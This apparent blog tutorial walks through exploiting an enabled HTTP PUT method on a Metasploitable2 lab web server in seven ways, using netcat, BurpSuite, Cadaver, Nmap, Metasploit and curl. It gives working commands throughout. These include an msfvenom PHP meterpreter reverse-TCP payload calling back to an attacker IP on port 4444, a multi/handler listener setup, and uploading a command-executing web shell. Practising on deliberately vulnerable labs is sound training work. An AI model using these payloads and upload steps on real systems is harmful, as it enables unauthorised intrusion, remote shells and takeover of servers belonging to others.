In this article, we’ll be exploiting the HTTP PUT method vulnerability on one of the Metasploitable2 webserver through which you can easily upload any malicious file onto the server and can gain the access of the whole webserver in meterpreter shell.
In last article, we’ve already learnt that how to Test HTTP Methods with Curl, Nmap and OpenSSL. If the HTTP PUT method is enabled on the webserver it can be used to upload a specified resource to the target server, such as a web shell or malware.
Basic Requirements –
- Metasploitable2 VM Machine – https://sourceforge.net/projects/metasploitable/files/Metasploitable2/
- Attacker’s Kali Linux VM Machine – https://www.kali.org/downloads/
- Vulnerable Path (Metasploitable2) – http://192.168.179.142/dav/
- Attacker’s IP – 192.168.179.141
HEAD, GET, POST, CONNECT – these methods are completely safe, at least as far as the HTTP Method itself. Of course, the request itself may have malicious parameters, but that is separate from the Method, these are typically the only ones that should be enabled.
PUT, DELETE – these methods were originally intended as file management operations. Some web servers still support these in their original format. That is, you can change or delete files from the server’s file system, arbitrarily.
- Obviously, if these are enabled, it opens you to some dangerous attacks like File Upload Vulnerability.
- File access permissions should be very strictly limited, if you absolutely MUST have these methods enabled.
OPTIONS – this is a diagnostic method, which returns a message useful mainly for debugging or to check which methods are active on the webserver.
TRACE – this is the surprising one, again, a diagnostic method that returns in the response body, the entire HTTP Request. This includes the request body, but also the request headers, including e.g. cookies, authorization headers, and more.
Let’s start –
The simplest and most basic form of identifying HTTP servers is to look at the Server field in the HTTP response header. Using a TCP client like Netcat, it is possible to send an HTTP request to return the HTTP response header of the server.
Netcat is the utility that is used for just about anything under the sun involving TCP or UDP. It can open TCP connections, send UDP packets, listen on arbitrary TCP and UDP ports, do port scanning, and deal with both IPv4 and IPv6.
To install Netcat on Debain OS – “sudo apt-get install netcat”
To find out which HTTP Methods are enabled on the webserver with netcat, just type
nc 192.168.179.142 80
OPTIONS /dav/ HTTP/1.1
Press twice enter !
If you observe the response header fields then you can see that some potential risky methods are open like DELETE, TRACE, PROPFIND, PROPPATCH, COPY, MOVE, LOCK and UNLOCK.
Here we are demonstrating the exploitation of PUT Method with 7 different ways:
1. Exploit PUT Method with Netcat –
To exploit PUT method with netcat, the process is very simple, just replace OPTIONS with PUT method.
nc 192.168.179.142 80
PUT /dav/hacked.txt HTTP/1.1
Press twice enter !
As you can see that, the file hacked.txt has been created with response code 201 Created under same /dav/ directory.
2. Exploit PUT Method with BurpSuite –
As we all knows BurpSuite is one of the most popular proxy intercepting tool through which you can easily analyze all kind of GET and POST requests.
Burp or Burp Suite is a graphical tool for testing Web application security. The tool is written in Java and developed by PortSwigger Security. The important tools inside BurpSuite are HTTP Proxy, Scanner, Intruder, Spider, Repeater, Decoder, Comparer, Extender and Sequencer.
In first step, just intercept the GET request of http://192.168.179.142/dav/ from your browser where you’ve set the manual proxy.
Now right click on its window and a list of options will appear as shown below. Further click on “Send to Repeater“.
Look over the below screenshot and you’ll find two panels i.e. left and right for request and response respectively.
Here we’re going to replace the GET Method with PUT method with name yeahhub.php that you need to upload/create with the malicious content/code.
Type PUT /dav/yeahhub.php HTTP/1.1 in header, it’ll upload the yeahhub.php file under dav directory through PUT request. Then paste the following malicious code in the end of the header request.
In above screenshot, you can analyze the response which is 201 Created, it means that file yeahhub.php has been uploaded with your malicious content.
To verify, just access the same URL in your browser “http://192.168.179.142/dav/yeahhub.php?cmd=uname-a” results the display of kernel version.
Scanning HTTP Methods with Nikto –
Nikto is the another Open Source web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers.
To scan with Nikto, type “nikto -h http://192.168.179.142/dav/” in your terminal.
As you can see that, the highlighted part showing various HTTP methods are allowed.
3. Exploit PUT Method with Cadaver & Metasploit Framework –
Now it is time to hack the server by uploading PHP malicious file which we’ll generate with the help of msfvenom command.
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.179.141 LPORT=4444 -f raw > shell.php
As you can see that, the malicious shell.php file has been created in current working directory.
Now run Cadaver tool which is already installed in every Kali Linux machine. Cadaver is a command line tool that support uploading and downloading of a file on webdav.
To run Cadaver, the command is:
Now you are inside victim’s directory. Upload the shell.php file which you’ve created with msfvenom as shown below:
dav:/dav/> PUT /root/shell.php
To verify that file is uploaded or not, open “http://192.168.179.142/dav/“.
Now next step is to start the metasploit framework and use multi/handler exploit as shown below:
To use multi/handler exploit, type the following commands in your terminal:
set LHOST 192.168.179.141
set LPORT 4444
set payload php/metrepreter/reverse_tcp
Here you can see that your reverse TCP handler has been started on 192.168.179.141:4444. Now as soon as you run shell.php file in your browser, you’ll get TCP reverse connection automatically with meterpreter shell.
Type “sysinfo” to view the target’s system information. There are alot of commands are available in meterpreter shell.
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
4. Exploit PUT Method with Nmap –
If PUT Method is enabled on any webserver, then you can also upload your malicious file with the help of Nmap which is an opensource port scanner and network exploitation tool.
To upload any malicious file with nmap type –
nmap -p 80 192.168.179.142 –script http-put –script-args http-put.url=’/dav/yeahhub_nmap.php’,http-put.file=’/root/Desktop/yeahhub_nmap.php’
Here you can see that, the file yeahhub_nmap.php has been created/uploaded under /dav/ directory.
5. Exploit PUT Method with Metasploit Framework –
Metasploit also gives you the ability to PUT a file with auxiliary/scanner/http/http_put.
This module i.e. HTTP_PUT can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests.
Set ACTION to either PUT or DELETE. PUT is the default. If filename isn’t specified, the module will generate a random string for you as a .txt file. If DELETE is used, a filename is required.
set RHOSTS 192.168.179.142
set path /dav/
set payload php/meterpreter/reverse_tcp
set filename yeah.php
set filedata file://root/Desktop/yeah.php
As you can see that, the file yeah.php has been successfully uploaded in the webserver under the path http://192.168.179.142/dav/yeah.php
6. Exploit PUT Method with CURL –
Curl is an another famous utility which is a command line tool for transferring data using various protocols.
To exploit PUT method with Curl, the command is:
curl -i -X PUT -H “Content-Type: text/plain; charset=utf-8” -d “YOUR TEXT HERE” http://192.168.179.142/dav/youhacked.php
As you can see that, the file youhacked.php has been created with your text which you can easily verify by accessing the URL http://192.168.179.142/dav/youhacked.php.
You can even browse the file path with the following command as shown below:
curl -i -X PUT -H “Content-Type: application/xml; charset=utf-8″ -d @”/root/Desktop/file.php” http://192.168.179.142/dav/file.php
7. Exploit PUT method with QuickPut Python Script –
QuickPut is a little command line tool written in Python that enables one to upload a file to a server using the HTTP PUT method.
It supports both basic and digest HTTP authentication, but does not solve the lost update problem.
To download QuickPut script, please refer to infomesh.net.
To use QuickPut, type the following command in your terminal:
python QuickPut.py <local file> <destination url>
python QuickPut.py /root/Desktop/file.php http://192.168.179.142/dav/chetan_soni.php
For any kind of doubt/query/help, feel free to contact us at firstname.lastname@example.org